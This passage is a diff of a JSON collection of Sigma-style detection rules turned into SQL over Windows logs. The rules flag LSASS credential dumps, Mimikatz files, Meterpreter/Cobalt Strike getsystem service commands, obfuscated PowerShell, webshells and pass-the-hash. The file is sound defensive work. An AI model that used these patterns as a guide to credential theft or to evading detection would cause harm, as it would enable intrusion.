OR Image LIKE '%\\\\Desktopimgdownldr.exe' ESCAPE '\\' OR Image LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR Image LIKE '%\\\\finger.exe' ESCAPE '\\' OR Image LIKE '%\\\\notepad.exe' ESCAPE '\\' OR Image LIKE '%\\\\AcroRd32.exe' ESCAPE '\\' OR Image LIKE '%\\\\RdrCEF.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.zip' ESCAPE '\\' OR TargetFilename LIKE '%.rar' ESCAPE '\\' OR TargetFilename LIKE '%.7z' ESCAPE '\\' OR TargetFilename LIKE '%.diagcab' ESCAPE '\\' OR TargetFilename LIKE '%.appx' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND RelativeTargetName = 'atsvc' AND Accesses LIKE '%WriteData%' ESCAPE '\\')" ], - "filename": "file_event_win_legitimate_app_dropping_archive.yml" + "filename": "win_security_atsvc_task.yml" }, { - "title": "UEFI Persistence Via Wpbbin - FileCreation", - "id": "e94b9ddc-eec5-4bb8-8a58-b9dc5f4e185f", - "status": "experimental", - "description": "Detects creation of a file named \"wpbbin\" in the \"%systemroot%\\system32\\\" directory. Which could be indicative of UEFI based persistence method", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "RDP Login from Localhost", + "id": "51e33403-2a37-4d66-a574-1fda1782cc31", + "status": "test", + "description": "RDP login with localhost source address may be a tunnelled login", + "author": "Thomas Patzke", "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.t1542.001" + "attack.lateral_movement", + "car.2013-07-002", + "attack.t1021.001" ], "falsepositives": [ - "Legitimate usage of the file by hardware manufacturer such as lenovo (Thanks @0gtweet for the tip)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\wpbbin.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '10' AND IpAddress IN ('::1', '127.0.0.1'))" ], - "filename": "file_event_win_wpbbin_persistence.yml" + "filename": "win_security_rdp_localhost_login.yml" }, { - "title": "LSASS Process Dump Artefact In CrashDumps Folder", - "id": "6902955a-01b7-432c-b32a-6f5f81d8f625", - "status": "experimental", - "description": "Detects the presence of an LSASS dump file in the \"CrashDumps\" folder. This could be a sign of LSASS credential dumping. Techniques such as the LSASS Shtinkering have been seen abusing the Windows Error Reporting to dump said process.", - "author": "@pbssubhash", + "title": "User Couldn't Call a Privileged Service 'LsaRegisterLogonProcess'", + "id": "6daac7fc-77d1-449a-a71a-e6b4d59a0e54", + "status": "test", + "description": "The 'LsaRegisterLogonProcess' function verifies that the application making the function call is a logon process by checking that it has the SeTcbPrivilege privilege set. Possible Rubeus tries to get a handle to LSA.", + "author": "Roberto Rodriguez (source), Ilyas Ochkov (rule), oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.lateral_movement", + "attack.privilege_escalation", + "attack.t1558.003" ], "falsepositives": [ - "Rare legitimate dump of the process by the operating system due to a crash of lsass" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\config\\\\systemprofile\\\\AppData\\\\Local\\\\CrashDumps\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%lsass.exe.%' ESCAPE '\\' AND TargetFilename LIKE '%.dmp' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4673' AND Service = 'LsaRegisterLogonProcess()' AND Keywords = '0x8010000000000000')" ], - "filename": "file_event_win_lsass_shtinkering.yml" + "filename": "win_security_user_couldnt_call_priv_service_lsaregisterlogonprocess.yml" }, { - "title": "WMI Persistence - Script Event Consumer File Write", - "id": "33f41cdd-35ac-4ba8-814b-c6a4244a1ad4", + "title": "NetNTLM Downgrade Attack", + "id": "d3abac66-f11c-4ed0-8acb-50cc29c97eed", "status": "test", - "description": "Detects file writes of WMI script event consumer", - "author": "Thomas Patzke", + "description": "Detects NetNTLM downgrade attack", + "author": "Florian Roth (Nextron Systems), wagga", "tags": [ - "attack.t1546.003", - "attack.persistence" + "attack.defense_evasion", + "attack.t1562.001", + "attack.t1112" ], "falsepositives": [ - "Dell Power Manager (C:\\Program Files\\Dell\\PowerManager\\DpmPowerPlanSetup.exe)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\wbem\\\\scrcons.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4657' AND ObjectName LIKE '%\\\\REGISTRY\\\\MACHINE\\\\SYSTEM%' ESCAPE '\\' AND ObjectName LIKE '%ControlSet%' ESCAPE '\\' AND ObjectName LIKE '%\\\\Control\\\\Lsa%' ESCAPE '\\' AND ObjectValueName IN ('LmCompatibilityLevel', 'NtlmMinClientSec', 'RestrictSendingNTLMTraffic'))" ], - "filename": "file_event_win_wmi_persistence_script_event_consumer_write.yml" + "filename": "win_security_net_ntlm_downgrade.yml" }, { - "title": "DLL Search Order Hijackig Via Additional Space in Path", - "id": "b6f91281-20aa-446a-b986-38a92813a18f", - "status": "experimental", - "description": "Detects when an attacker create a similar folder structure to windows system folders such as (Windows, Program Files...)\nbut with a space in order to trick DLL load search order and perform a \"DLL Search Order Hijacking\" attack\n", - "author": "frack113, Nasreddine Bencherchali", + "title": "AD Object WriteDAC Access", + "id": "028c7842-4243-41cd-be6f-12f3cf1a26c7", + "status": "test", + "description": "Detects WRITE_DAC access to a domain object", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.persistence", - "attack.privilege_escalation", "attack.defense_evasion", - "attack.t1574.002" + "attack.t1222.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE 'C:\\\\Windows \\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Program Files \\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Program Files (x86) \\\\%' ESCAPE '\\') AND TargetFilename LIKE '%.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4662' AND ObjectServer = 'DS' AND AccessMask = '0x40000' AND ObjectType IN ('19195a5b-6da0-11d0-afd3-00c04fd930c9', 'domainDNS'))" ], - "filename": "file_event_win_dll_sideloading_space_path.yml" + "filename": "win_security_ad_object_writedac_access.yml" }, - { - "title": "Mimikatz Kirbi File Creation", - "id": "9e099d99-44c2-42b6-a6d8-54c3545cab29", + { + "title": "Meterpreter or Cobalt Strike Getsystem Service Installation - Security", + "id": "ecbc5e16-58e0-4521-9c60-eb9a7ea4ad34", "status": "test", - "description": "Detects the creation of files created by mimikatz such as \".kirbi\", \"mimilsa.log\", etc.", - "author": "Florian Roth (Nextron Systems), David ANDRE", + "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation", + "author": "Teymur Kheirkhabarov, Ecco, Florian Roth", "tags": [ - "attack.credential_access", - "attack.t1558" + "attack.privilege_escalation", + "attack.t1134.001", + "attack.t1134.002" ], "falsepositives": [ - "Unlikely" + "Highly unlikely" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%.kirbi' ESCAPE '\\' OR TargetFilename LIKE '%mimilsa.log' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ((ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%/c%' ESCAPE '\\' AND ServiceFileName LIKE '%echo%' ESCAPE '\\' AND ServiceFileName LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ServiceFileName LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND ServiceFileName LIKE '%/c%' ESCAPE '\\' AND ServiceFileName LIKE '%echo%' ESCAPE '\\' AND ServiceFileName LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ServiceFileName LIKE '%cmd.exe%' ESCAPE '\\' AND ServiceFileName LIKE '%/c%' ESCAPE '\\' AND ServiceFileName LIKE '%echo%' ESCAPE '\\' AND ServiceFileName LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ServiceFileName LIKE '%rundll32%' ESCAPE '\\' AND ServiceFileName LIKE '%.dll,a%' ESCAPE '\\' AND ServiceFileName LIKE '%/p:%' ESCAPE '\\')))" ], - "filename": "file_event_win_hktl_mimikatz_files.yml" + "filename": "win_security_meterpreter_or_cobaltstrike_getsystem_service_install.yml" }, { - "title": "Anydesk Temporary Artefact", - "id": "0b9ad457-2554-44c1-82c2-d56a99c42377", - "status": "test", - "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", - "author": "frack113", + "title": "Invoke-Obfuscation VAR+ Launcher - Security", + "id": "dcf2db1f-f091-425b-a821-c05875b8925a", + "status": "experimental", + "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate use" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\AnyDesk\\\\user.conf%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\AnyDesk\\\\system.conf%' ESCAPE '\\') AND TargetFilename LIKE '%.temp' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%\"set%' ESCAPE '\\' AND ServiceFileName LIKE '%-f%' ESCAPE '\\' AND (ServiceFileName LIKE '%/c%' ESCAPE '\\' OR ServiceFileName LIKE '%/r%' ESCAPE '\\'))" ], - "filename": "file_event_win_anydesk_artefact.yml" + "filename": "win_security_invoke_obfuscation_var_services_security.yml" }, { - "title": "Dumpert Process Dumper Default File", - "id": "93d94efc-d7ad-4161-ad7d-1638c4f908d8", + "title": "Failed Logon From Public IP", + "id": "f88e112a-21aa-44bd-9b01-6ee2a2bbbed1", "status": "test", - "description": "Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory", - "author": "Florian Roth (Nextron Systems)", + "description": "A login from a public IP can indicate a misconfigured firewall or network boundary.", + "author": "NVISO", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.initial_access", + "attack.persistence", + "attack.t1078", + "attack.t1190", + "attack.t1133" ], "falsepositives": [ - "Very unlikely" + "Legitimate logon attempts over the internet", + "IPv4-to-IPv6 mapped IPs" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Windows\\\\Temp\\\\dumpert.dmp' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4625' AND NOT ((IpAddress LIKE '%-%' ESCAPE '\\') OR ((IpAddress LIKE '10.%' ESCAPE '\\' OR IpAddress LIKE '192.168.%' ESCAPE '\\' OR IpAddress LIKE '172.16.%' ESCAPE '\\' OR IpAddress LIKE '172.17.%' ESCAPE '\\' OR IpAddress LIKE '172.18.%' ESCAPE '\\' OR IpAddress LIKE '172.19.%' ESCAPE '\\' OR IpAddress LIKE '172.20.%' ESCAPE '\\' OR IpAddress LIKE '172.21.%' ESCAPE '\\' OR IpAddress LIKE '172.22.%' ESCAPE '\\' OR IpAddress LIKE '172.23.%' ESCAPE '\\' OR IpAddress LIKE '172.24.%' ESCAPE '\\' OR IpAddress LIKE '172.25.%' ESCAPE '\\' OR IpAddress LIKE '172.26.%' ESCAPE '\\' OR IpAddress LIKE '172.27.%' ESCAPE '\\' OR IpAddress LIKE '172.28.%' ESCAPE '\\' OR IpAddress LIKE '172.29.%' ESCAPE '\\' OR IpAddress LIKE '172.30.%' ESCAPE '\\' OR IpAddress LIKE '172.31.%' ESCAPE '\\' OR IpAddress LIKE '127.%' ESCAPE '\\' OR IpAddress LIKE '169.254.%' ESCAPE '\\')) OR (IpAddress = '::1' OR (IpAddress LIKE 'fe80::%' ESCAPE '\\' OR IpAddress LIKE 'fc00::%' ESCAPE '\\'))))" ], - "filename": "file_event_win_hktl_dumpert.yml" + "filename": "win_security_susp_failed_logon_source.yml" }, { - "title": "Installation of TeamViewer Desktop", - "id": "9711de76-5d4f-4c50-a94f-21e4e8f8384d", - "status": "test", - "description": "TeamViewer_Desktop.exe is create during install", + "title": "Device Installation Blocked", + "id": "c9eb55c3-b468-40ab-9089-db2862e42137", + "status": "experimental", + "description": "Detects an installation of a device that is forbidden by the system policy", "author": "frack113", - "tags": [ - "attack.command_and_control", - "attack.t1219" - ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\TeamViewer\\_Desktop.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '6423')" ], - "filename": "file_event_win_install_teamviewer_desktop.yml" + "filename": "win_security_device_installation_blocked.yml" }, { - "title": "Suspicious Startup Folder Persistence", - "id": "28208707-fe31-437f-9a7f-4b1108b94d2e", + "title": "Important Scheduled Task Deleted/Disabled", + "id": "7595ba94-cf3b-4471-aa03-4f6baa9e5fad", "status": "experimental", - "description": "Detects when a file with a suspicious extension is created in the startup folder", + "description": "Detects when adversaries stop services or processes by deleting or disabling their respective scheduled tasks in order to conduct data destructive activities", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.execution", + "attack.privilege_escalation", "attack.persistence", - "attack.t1547.001" + "attack.t1053.005" ], "falsepositives": [ - "Rare legitimate usage of some of the extensions mentioned in the rule" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.jar' ESCAPE '\\' OR TargetFilename LIKE '%.msi' ESCAPE '\\' OR TargetFilename LIKE '%.scr' ESCAPE '\\' OR TargetFilename LIKE '%.cmd' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID IN ('4699', '4701') AND (TaskName LIKE '%\\\\Windows\\\\SystemRestore\\\\SR%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\BitLocker%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\WindowsBackup\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\WindowsUpdate\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\UpdateOrchestrator\\\\Schedule%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\ExploitGuard%' ESCAPE '\\')) AND NOT ((EventID = '4699' AND SubjectUserName LIKE '%$' ESCAPE '\\' AND TaskName LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\')))" ], - "filename": "file_event_win_susp_startup_folder_persistence.yml" + "filename": "win_security_susp_scheduled_task_delete_or_disable.yml" }, { - "title": "CVE-2021-44077 POC Default Dropped File", - "id": "7b501acf-fa98-4272-aa39-194f82edc8a3", - "status": "experimental", - "description": "Detects the creation of \"msiexec.exe\" in the \"bin\" directory of the ManageEngine SupportCenter Plus (Related to CVE-2021-44077) and public POC available (See references section)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "ADCS Certificate Template Configuration Vulnerability", + "id": "5ee3a654-372f-11ec-8d3d-0242ac130003", + "status": "test", + "description": "Detects certificate creation with template allowing risk permission subject", + "author": "Orlinum , BlueDefenZer", "tags": [ - "attack.execution", - "cve.2021.44077" + "attack.privilege_escalation", + "attack.credential_access" ], "falsepositives": [ - "Unlikely" + "Administrator activity", + "Proxy SSL certificate with subject modification", + "Smart card enrollement" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\ManageEngine\\\\SupportCenterPlus\\\\bin\\\\msiexec.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4898' AND TemplateContent LIKE '%CT\\_FLAG\\_ENROLLEE\\_SUPPLIES\\_SUBJECT%' ESCAPE '\\') OR (EventID = '4899' AND NewTemplateContent LIKE '%CT\\_FLAG\\_ENROLLEE\\_SUPPLIES\\_SUBJECT%' ESCAPE '\\')))" ], - "filename": "file_event_win_cve_2021_44077_poc_default_files.yml" + "filename": "win_security_adcs_certificate_template_configuration_vulnerability.yml" }, { - "title": "Suspicious PROCEXP152.sys File Created In TMP", - "id": "3da70954-0f2c-4103-adff-b7440368f50e", + "title": "DCOM InternetExplorer.Application Iertutil DLL Hijack - Security", + "id": "c39f0c81-7348-4965-ab27-2fde35a1b641", "status": "test", - "description": "Detects the creation of the PROCEXP152.sys file in the application-data local temporary folder.\nThis driver is used by Sysinternals Process Explorer but also by KDU (https://github.com/hfiref0x/KDU) or Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU.\n", - "author": "xknow (@xknow_infosec), xorxes (@xor_xes)", + "description": "Detects a threat actor creating a file named `iertutil.dll` in the `C:\\Program Files\\Internet Explorer\\` directory over the network for a DCOM InternetExplorer DLL Hijack scenario.", + "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)", "tags": [ - "attack.t1562.001", - "attack.defense_evasion" + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1021.003" ], "falsepositives": [ - "Other legimate tools using this driver and filename (like Sysinternals). Note - Clever attackers may easily bypass this detection by just renaming the driver filename. Therefore just Medium-level and don't rely on it." + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%PROCEXP152.sys' ESCAPE '\\') AND NOT ((Image LIKE '%\\\\procexp64.exe%' ESCAPE '\\' OR Image LIKE '%\\\\procexp.exe%' ESCAPE '\\' OR Image LIKE '%\\\\procmon64.exe%' ESCAPE '\\' OR Image LIKE '%\\\\procmon.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND RelativeTargetName LIKE '%\\\\Internet Explorer\\\\iertutil.dll' ESCAPE '\\') AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" ], - "filename": "file_event_win_susp_procexplorer_driver_created_in_tmp_folder.yml" + "filename": "win_security_dcom_iertutil_dll_hijack.yml" }, { - "title": "WerFault LSASS Process Memory Dump", - "id": "c3e76af5-4ce0-4a14-9c9a-25ceb8fda182", - "status": "experimental", - "description": "Detects WerFault creating a dump file with a name that indicates that the dump file could be an LSASS process memory, which contains user credentials", - "author": "Florian Roth (Nextron Systems)", + "title": "External Disk Drive Or USB Storage Device", + "id": "f69a87ea-955e-4fb4-adb2-bb9fd6685632", + "status": "test", + "description": "Detects external diskdrives or plugged in USB devices , EventID 6416 on windows 10 or later", + "author": "Keith Wright", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.t1091", + "attack.t1200", + "attack.lateral_movement", + "attack.initial_access" ], "falsepositives": [ - "Unknown" + "Legitimate administrative activity" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\WerFault.exe' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\lsass%' ESCAPE '\\' OR TargetFilename LIKE '%lsass.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '6416' AND ClassName = 'DiskDrive') OR DeviceDescription = 'USB Mass Storage Device'))" ], - "filename": "file_event_win_lsass_werfault_dump.yml" + "filename": "win_security_external_device.yml" }, { - "title": "Suspicious PFX File Creation", - "id": "dca1b3e8-e043-4ec8-85d7-867f334b5724", - "status": "test", - "description": "A general detection for processes creating PFX files. This could be an indicator of an adversary exporting a local certificate to a PFX file.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "SCM Database Handle Failure", + "id": "13addce7-47b2-4ca0-a98f-1de964d1d669", + "status": "experimental", + "description": "Detects non-system users failing to get a handle of the SCM database.", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.credential_access", - "attack.t1552.004" + "attack.discovery", + "attack.t1010" ], "falsepositives": [ - "System administrators managing certififcates." + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND TargetFilename LIKE '%.pfx' ESCAPE '\\' AND NOT ((TargetFilename LIKE '%\\\\Templates\\\\Windows\\\\Windows\\_TemporaryKey.pfx%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\CMake\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4656' AND ObjectType LIKE 'SC\\_MANAGER OBJECT' ESCAPE '\\' AND ObjectName = 'ServicesActive' AND AccessMask = '0xf003f') AND NOT (SubjectLogonId = '0x3e4'))" ], - "filename": "file_event_win_susp_pfx_file_creation.yml" + "filename": "win_security_scm_database_handle_failure.yml" }, { - "title": "Windows Webshell Creation", - "id": "39f1f9f2-9636-45de-98f6-a4046aa8e4b9", + "title": "Password Protected ZIP File Opened (Email Attachment)", + "id": "571498c8-908e-40b4-910b-d2369159a3da", + "status": "experimental", + "description": "Detects the extraction of password protected ZIP archives. See the filename variable for more details on which file has been opened.", + "author": "Florian Roth (Nextron Systems)", + "falsepositives": [ + "Legitimate used of encrypted ZIP files" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5379' AND TargetName LIKE '%Microsoft\\_Windows\\_Shell\\_ZipFolder:filename%' ESCAPE '\\' AND TargetName LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook%' ESCAPE '\\')" + ], + "filename": "win_security_susp_opened_encrypted_zip_outlook.yml" + }, + { + "title": "New or Renamed User Account with '$' in Attribute 'SamAccountName'", + "id": "cfeed607-6aa4-4bbd-9627-b637deb723c8", "status": "test", - "description": "Possible webshell file creation on a static web site", - "author": "Beyu Denis, oscd.community, Tim Shelton", + "description": "Detects possible bypass EDR and SIEM via abnormal user account name.", + "author": "Ilyas Ochkov, oscd.community", "tags": [ - "attack.persistence", - "attack.t1505.003" + "attack.defense_evasion", + "attack.t1036" ], "falsepositives": [ - "Legitimate administrator or developer creating legitimate executable files in a web application folder" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\inetpub\\\\wwwroot\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.asp%' ESCAPE '\\' OR TargetFilename LIKE '%.ashx%' ESCAPE '\\' OR TargetFilename LIKE '%.ph%' ESCAPE '\\')) OR ((TargetFilename LIKE '%\\\\www\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\htdocs\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\html\\\\%' ESCAPE '\\') AND TargetFilename LIKE '%.ph%' ESCAPE '\\')) AND NOT (((TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\')) OR (Image = 'System') OR (TargetFilename LIKE '%\\\\xampp%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4720' AND SamAccountName LIKE '%$%' ESCAPE '\\') OR (EventID = '4781' AND NewTargetUserName LIKE '%$%' ESCAPE '\\')))" ], - "filename": "file_event_win_webshell_creation_detect.yml" + "filename": "win_security_new_or_renamed_user_account_with_dollar_sign.yml" }, { - "title": "Suspicious Outlook Macro Created", - "id": "117d3d3a-755c-4a61-b23e-9171146d094c", + "title": "Malicious Service Installations", + "id": "cb062102-587e-4414-8efa-dbe3c7bf19c6", "status": "test", - "description": "Detects the creation of a macro file for Outlook.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects known malicious service installs that only appear in cases of lateral movement, credential dumping, and other suspicious activities.", + "author": "Florian Roth (Nextron Systems), Daniil Yugoslavskiy, oscd.community (update)", "tags": [ "attack.persistence", - "attack.command_and_control", - "attack.t1137", - "attack.t1008", - "attack.t1546" + "attack.privilege_escalation", + "attack.t1003", + "car.2013-09-005", + "attack.t1543.003", + "attack.t1569.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND TargetFilename LIKE '%\\\\Microsoft\\\\Outlook\\\\VbaProject.OTM' ESCAPE '\\' AND NOT (Image LIKE '%\\\\outlook.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceName = 'javamtsup')" ], - "filename": "file_event_win_office_outlook_susp_macro_creation.yml" + "filename": "win_security_mal_service_installs.yml" }, { - "title": "Potential Persistence Attempt Via ErrorHandler.Cmd", - "id": "15904280-565c-4b73-9303-3291f964e7f9", - "status": "experimental", - "description": "Detects creation of a file named \"ErrorHandler.cmd\" in the \"C:\\WINDOWS\\Setup\\Scripts\\\" directory which could be used as a method of persistence\nThe content of C:\\WINDOWS\\Setup\\Scripts\\ErrorHandler.cmd is read whenever some tools under C:\\WINDOWS\\System32\\oobe\\ (e.g. Setup.exe) fail to run for any reason.\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Windows Network Access Suspicious desktop.ini Action", + "id": "35bc7e28-ee6b-492f-ab04-da58fcf6402e", + "status": "test", + "description": "Detects unusual processes accessing desktop.ini remotely over network share, which can be leveraged to alter how Explorer displays a folder's content (i.e. renaming files) without changing them on disk.", + "author": "Tim Shelton (HAWK.IO)", "tags": [ - "attack.persistence" + "attack.persistence", + "attack.t1547.009" ], "falsepositives": [ - "Unknown" + "Read only access list authority" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\WINDOWS\\\\Setup\\\\Scripts\\\\ErrorHandler.cmd' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ObjectType = 'File' AND RelativeTargetName LIKE '%\\\\desktop.ini' ESCAPE '\\' AND (AccessList LIKE '%WriteData%' ESCAPE '\\' OR AccessList LIKE '%DELETE%' ESCAPE '\\' OR AccessList LIKE '%WriteDAC%' ESCAPE '\\' OR AccessList LIKE '%AppendData%' ESCAPE '\\' OR AccessList LIKE '%AddSubdirectory%' ESCAPE '\\'))" ], - "filename": "file_event_win_persistence_error_handler_cmd.yml" + "filename": "win_security_net_share_obj_susp_desktop_ini.yml" }, { - "title": "Creation In User Word Startup Folder", - "id": "a10a2c40-2c4d-49f8-b557-1a946bc55d9d", - "status": "experimental", - "description": "Detects the creation of an file in user Word Startup", - "author": "frack113", + "title": "Pass the Hash Activity 2", + "id": "8eef149c-bd26-49f2-9e5a-9b00e3af499b", + "status": "stable", + "description": "Detects the attack technique pass the hash which is used to move laterally inside the network", + "author": "Dave Kennedy, Jeff Warren (method) / David Vassallo (rule)", "tags": [ - "attack.resource_development", - "attack.t1587.001" + "attack.lateral_movement", + "attack.t1550.002" ], "falsepositives": [ - "Addition of legitimate plugins" + "Administrator activity" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Word\\\\STARTUP\\\\%' ESCAPE 